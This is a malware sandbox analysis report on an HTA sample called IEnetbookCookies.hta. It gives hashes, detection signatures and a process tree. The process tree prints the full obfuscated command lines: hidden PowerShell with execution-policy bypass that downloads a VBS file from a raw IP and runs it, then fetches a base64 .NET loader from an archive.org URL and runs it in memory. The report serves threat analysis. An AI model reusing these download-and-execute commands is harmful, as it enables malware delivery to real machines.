Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
25-09-2024 00:31
Static task
static1
Behavioral task
behavioral1
Sample
IEnetbookCookies.hta
Resource
win7-20240729-en
General
-
Target
IEnetbookCookies.hta
-
Size
115KB
-
MD5
e22849cf884da37532e50f50a298c344
-
SHA1
b40e6ca50290ed885ff60c691444b33f3fb0a643
-
SHA256
e15bf785da97ec4893315687222ab28f491b49de7e95558086cd59d23b85c057
-
SHA512
7d241fe5b00949a1b3f12f86359f1870a19fbf400b7ebb10ae6936ea44ab6ac01cd838d801a7be502b3e58c97c33db317ef1d0bc12db108f2f766ad6bf03b40e
-
SSDEEP
96:Ea+M7XN7VQ63VQcuLNdfJ1LV9jzeVQda8AT:Ea+QXgXPnzILT
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2684 powershell.exe 6 2148 powershell.exe 7 2148 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 792 powershell.exe 2148 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 2684 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 792 powershell.exe 2148 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 792 powershell.exe Token: SeDebugPrivilege 2148 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2324 wrote to memory of 2988 2324 mshta.exe 30 PID 2324 wrote to memory of 2988 2324 mshta.exe 30 PID 2324 wrote to memory of 2988 2324 mshta.exe 30 PID 2324 wrote to memory of 2988 2324 mshta.exe 30 PID 2988 wrote to memory of 2684 2988 cmd.exe 32 PID 2988 wrote to memory of 2684 2988 cmd.exe 32 PID 2988 wrote to memory of 2684 2988 cmd.exe 32 PID 2988 wrote to memory of 2684 2988 cmd.exe 32 PID 2684 wrote to memory of 3044 2684 powershell.exe 33 PID 2684 wrote to memory of 3044 2684 powershell.exe 33 PID 2684 wrote to memory of 3044 2684 powershell.exe 33 PID 2684 wrote to memory of 3044 2684 powershell.exe 33 PID 3044 wrote to memory of 2116 3044 csc.exe 34 PID 3044 wrote to memory of 2116 3044 csc.exe 34 PID 3044 wrote to memory of 2116 3044 csc.exe 34 PID 3044 wrote to memory of 2116 3044 csc.exe 34 PID 2684 wrote to memory of 2532 2684 powershell.exe 36 PID 2684 wrote to memory of 2532 2684 powershell.exe 36 PID 2684 wrote to memory of 2532 2684 powershell.exe 36 PID 2684 wrote to memory of 2532 2684 powershell.exe 36 PID 2532 wrote to memory of 792 2532 WScript.exe 37 PID 2532 wrote to memory of 792 2532 WScript.exe 37 PID 2532 wrote to memory of 792 2532 WScript.exe 37 PID 2532 wrote to memory of 792 2532 WScript.exe 37 PID 792 wrote to memory of 2148 792 powershell.exe 39 PID 792 wrote to memory of 2148 792 powershell.exe 39 PID 792 wrote to memory of 2148 792 powershell.exe 39 PID 792 wrote to memory of 2148 792 powershell.exe 39
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\IEnetbookCookies.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C pOWersHElL -ex ByPasS -Nop -w 1 -C deVIcECRedeNtiaLDeploYmeNt ; iex($(IeX('[sYStEm.tEXT.ENCoding]'+[ChAr]58+[chAR]0X3A+'utf8.gEtSTrInG([SySTem.COnveRT]'+[Char]0x3a+[cHAR]0X3A+'fROmbasE64STring('+[ChAr]0X22+'JG9QMmVEVUJFZ2ogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQmVyZGVmaW5JVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZObEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xYWU9ZZXEsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbUpBenZBKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVmsiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRtQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkb1AyZURVQkVnajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4yNTUuMjI3LjI0OC94YW1wcC9rYi9uaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnRJRiIsIiRlTnY6QVBQREFUQVxuaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnZCUyIsMCwwKTtzdEFSVC1TTGVFUCgzKTtTVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXBpY3R1cmV3aXRoaGVyaW1hZ2VzZ29vZC52QlMi'+[ChAr]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOWersHElL -ex ByPasS -Nop -w 1 -C deVIcECRedeNtiaLDeploYmeNt ; iex($(IeX('[sYStEm.tEXT.ENCoding]'+[ChAr]58+[chAR]0X3A+'utf8.gEtSTrInG([SySTem.COnveRT]'+[Char]0x3a+[cHAR]0X3A+'fROmbasE64STring('+[ChAr]0X22+'JG9QMmVEVUJFZ2ogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQmVyZGVmaW5JVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZObEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xYWU9ZZXEsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbUpBenZBKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVmsiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRtQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkb1AyZURVQkVnajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4yNTUuMjI3LjI0OC94YW1wcC9rYi9uaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnRJRiIsIiRlTnY6QVBQREFUQVxuaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnZCUyIsMCwwKTtzdEFSVC1TTGVFUCgzKTtTVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXBpY3R1cmV3aXRoaGVyaW1hZ2VzZ29vZC52QlMi'+[ChAr]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xwrg6myx.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3026.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3025.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2116
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicepicturewithherimagesgood.vBS"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbElkWzFdKyRTSEVsTGlEWzEzXSsneCcpICggKCd4UGl1cmwnKycgPScrJyBzJysna3JodHRwJysnczovLycrJ2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdicrJ2Uub3JnJysnLzI0L2l0JysnZScrJ21zL2RldGFoLScrJ25vdGUtJysndi9EZScrJ3RhaE5vdGVWJysnLnR4dHNrJysncjt4UGknKydiYScrJ3NlJysnNjRDbycrJ24nKyd0ZScrJ250ID0gKCcrJ05ldy1PYmplJysnY3QgUycrJ3lzdGVtLicrJ05ldC5XZWJDJysnbGknKydlbnQpLicrJ0Rvd25sJysnb2FkU3RyaW4nKydnKHhQaXVybCk7JysneFAnKydpJysnYmluYXJ5JysnQ29udGUnKydudCA9IFtTeXN0JysnZW0uQ29udmVydF06OkZyb21CJysnYScrJ3NlNjRTJysndHJpbicrJ2coeFBpJysnYmFzZTY0Q29udGUnKyduJysndCk7eFBpYXMnKydzZW1ibHkgPScrJyBbUmVmbGVjJysndCcrJ2knKydvbi5Bc3NlbWJseScrJ106JysnOkwnKydvYWQoJysneFBpYmluJysnYXInKyd5Q29udGVudCk7eFAnKydpdHknKydwZSA9IHgnKydQaWFzJysnc2VtJysnYicrJ2x5LkdlJysndFR5cCcrJ2Uoc2tyJysnUnUnKyduUCcrJ0UuSG9tZXNrcicrJyk7eFBpJysnbWUnKyd0aG9kID0geFBpdHknKydwZS5HZXRNZXQnKydobycrJ2QoJysnc2tyVkFJc2tyJysnKTt4UCcrJ2knKydtZXRob2QnKycuSW52Jysnb2tlKHhQaW51bGwnKycsJysnIFsnKydvYmplJysnY3RbXV1AJysnKHNrcnR4dC5LS1JPTksnKycvYmsvcHBtYXgnKycvODQyLjcnKycyJysnMi41NTIuNDMxLy86cCcrJ3R0aHNrciAsJysnICcrJ3MnKydrcmRlc2F0aXZhZG8nKydza3IgLCAnKydza3JkJysnZXNhdGl2JysnYWQnKydvcycrJ2snKydyICcrJywgc2tyZCcrJ2UnKydzYXRpdmFkb3Nrcixza3JSZScrJ2dBcycrJ21zaycrJ3Isc2tyc2tyKSknKS5SRVBsQWNFKCd4UGknLCckJykuUkVQbEFjRSgoW2NIQXJdMTE1K1tjSEFyXTEwNytbY0hBcl0xMTQpLFtTVHJpTkddW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllId[1]+$SHElLiD[13]+'x') ( ('xPiurl'+' ='+' s'+'krhttp'+'s://'+'ia600100'+'.us.'+'archiv'+'e.org'+'/24/it'+'e'+'ms/detah-'+'note-'+'v/De'+'tahNoteV'+'.txtsk'+'r;xPi'+'ba'+'se'+'64Co'+'n'+'te'+'nt = ('+'New-Obje'+'ct S'+'ystem.'+'Net.WebC'+'li'+'ent).'+'Downl'+'oadStrin'+'g(xPiurl);'+'xP'+'i'+'binary'+'Conte'+'nt = [Syst'+'em.Convert]::FromB'+'a'+'se64S'+'trin'+'g(xPi'+'base64Conte'+'n'+'t);xPias'+'sembly ='+' [Reflec'+'t'+'i'+'on.Assembly'+']:'+':L'+'oad('+'xPibin'+'ar'+'yContent);xP'+'ity'+'pe = x'+'Pias'+'sem'+'b'+'ly.Ge'+'tTyp'+'e(skr'+'Ru'+'nP'+'E.Homeskr'+');xPi'+'me'+'thod = xPity'+'pe.GetMet'+'ho'+'d('+'skrVAIskr'+');xP'+'i'+'method'+'.Inv'+'oke(xPinull'+','+' ['+'obje'+'ct[]]@'+'(skrtxt.KKRONK'+'/bk/ppmax'+'/842.7'+'2'+'2.552.431//:p'+'tthskr ,'+' '+'s'+'krdesativado'+'skr , '+'skrd'+'esativ'+'ad'+'os'+'k'+'r '+', skrd'+'e'+'sativadoskr,skrRe'+'gAs'+'msk'+'r,skrskr))').REPlAcE('xPi','$').REPlAcE(([cHAr]115+[cHAr]107+[cHAr]114),[STriNG][cHAr]39))"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ca727246c6ddbe1c676588d3397ab2f7
SHA103b7cc0d27d524e43c841fac3b1c15d55f506026
SHA2561111e4e26a219c48cdb766417fb5bee1e7420fbdbfac2756ce569d97be09b1a9
SHA5127a90012b4ed93b1b0112d7f8cd69bcfe76cf10fb445e1fb3a2d8e6e6ff7e8b7f737ee05c6045c72899dcb879f89fbc8e2efd1bf0aa64c1afa535d00bc209c063
-
Filesize
3KB
MD560876b3a15bc8600044684103b5b55a3
SHA156da17619d927f0fbe75beadc2d4ac7dabd077c5
SHA256ecf4bc2a64e11ccd498ac8be53770429ee3919e5cc5b914fafbb5a1298fff35f
SHA512e3894fd32137adab956a29911c0452b3d5c904a350d3713b331bc065fa20aa0ca135b8fd7c11dc7e12d0accbeca91eb0c69b6ad2ab808975e5470fcd86f8b144
-
Filesize
7KB
MD5012eff455317906674cf2355079c2b02
SHA1866628ede5a22dec07c027d18c353372b2e1e038
SHA256197bb2fa66b26931fba867c6aafd0d4b8eb4d6883c992fac847e76f404faad9b
SHA512f3dda9383377de9360073be39ef0abd83809129482fbd7ab554b2a122087e661e2b5f7538f6d46f32e46c010eb82583e1e1554abd65c9a4e1b245962935c9a78
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5bf333cb561c982d42c18ad78ab62a184
SHA1f2f0a403d4125f954c24a4c15fc0ed9410142887
SHA2567bd7ffa70895dbf847990c3c01fca28795e0640c950959d984ef54c1b3c6cf2a
SHA5124429ff59dce0da1e696e8660cc644db380873624afdfd3958a4ada47d66c9feab2e6322d6fff0a8f60a149bf67b186f84ee3d8c0f0021e4e5cc73546ea43206a
-
Filesize
257KB
MD5134f2e8115174dea5246b807fd0c8427
SHA1c47a738087706c17b345c8b93b8eb71c1518e3a8
SHA25601b5377b8e2fd5cc88c57a2115fefc853ddecbf4aff300357391dcd803b7d67d
SHA512efc7386287e271b6d1050f1c585073351b0b9cc9cd551cb759f02fbe4a492bb3ff20b3d498cd608558353b1879a591ae630e5e0e1e0d7286a31fdde7787c0c08
-
Filesize
652B
MD5c6ace8f4839cba417637e7e3a08db3da
SHA1ce588cd32827d6918406b1280b7394c4e0f38f6b
SHA256c55d05808b92e29312fcaeae3f4dac1e43868a348a9126ef5c369ffd06d8472f
SHA51267994cc3d1aaa2583287c6a66f6e4abf548c4bf73202f8c7c900e48cbc9e783c7d9c42f16d75ffc642067a2ac49f5141f2614a78989713ff3f67de1696319b18
-
Filesize
458B
MD5e07522da7bc6c3ae3fc141d4f7384edf
SHA10b2d7ab75bca2211d5aea9a1671929f033bbaf09
SHA256b0428efd614521c6b91abdad5a9885a2698f8729a6fc77087383a4a07e28da19
SHA5126d30515cd0dddd23f8d2554d107c5afee82d29aa7c5dc6878546758350c13bd8421b066b39bd1d782381e70e75f9afe1e521d301e9478ecf16f9b075ed34addd
-
Filesize
309B
MD5bed9e0b0665e0319e0309e990b6f5a88
SHA15405ef66bd625426b5976c7f74300262fcd9468a
SHA256efc3e41e3706a5b71629566084852186acb5866766217c4d1e29d296aca9ef0d
SHA5120f77b77ddcad4e669300b628780a6998cbf2f5df5a4e1dcef722e3b7d0632867c8104c184cf02e8016ca35d85e4ffc378dd9b1fc6050f6263a2b494e92e37621